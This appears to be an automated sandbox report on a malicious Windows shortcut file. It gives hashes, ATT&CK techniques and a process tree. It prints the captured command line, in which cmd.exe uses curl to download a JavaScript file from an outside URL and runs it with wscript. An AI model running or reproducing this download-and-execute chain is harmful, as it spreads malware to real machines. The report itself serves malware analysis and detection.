2a49944b548ca919f6c05bac4434b359a0bc81422901ac3c80160e383c1813e6

Analysis

max time kernel
42s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
09-09-2022 16:40

Target

Hiccorrupti188.lnk
Size

2KB
MD5

565d7da79e3da03b4f556f100955c10e
SHA1

2b4a629e7c6a74f7d72abe6522128b0db94a12d3
SHA256

2a49944b548ca919f6c05bac4434b359a0bc81422901ac3c80160e383c1813e6
SHA512

2a225d8a66ed416a7ed99aab6ad7a6cc0a44d4f3a1be1b2f5c38237598898b2f9099c67224a805953f95c9af620a6d991afd7fc5fd2f7286e6a7eb06a9928835

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

756 PING.EXE

pid	process
756	PING.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 864 wrote to memory of 1780	864	cmd.exe	cmd.exe
PID 864 wrote to memory of 1780	864	cmd.exe	cmd.exe
PID 864 wrote to memory of 1780	864	cmd.exe	cmd.exe
PID 1780 wrote to memory of 756	1780	cmd.exe	PING.EXE
PID 1780 wrote to memory of 756	1780	cmd.exe	PING.EXE
PID 1780 wrote to memory of 756	1780	cmd.exe	PING.EXE

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Hiccorrupti188.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c echo 'a0' && ping 4j.org && MD "C:\Users\Admin\AppData\Roaming\HM\K86O6h" && echo "PH" && curl.exe --output C:\Users\Admin\AppData\Roaming\HM\K86O6h\tEZgi.tEY.QcZ.js https://matrixcommunication.net/s4Y/0.html && cd "C:\Users\Admin\AppData\Roaming\HM\K86O6h" && wscript tEZgi.tEY.QcZ.js
2⤵
- Suspicious use of WriteProcessMemory
PID:1780

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Remote System Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

memory/756-91-0x0000000000000000-mapping.dmp

Download
memory/864-54-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

Filesize
8KB

Download
memory/1780-88-0x0000000000000000-mapping.dmp

Download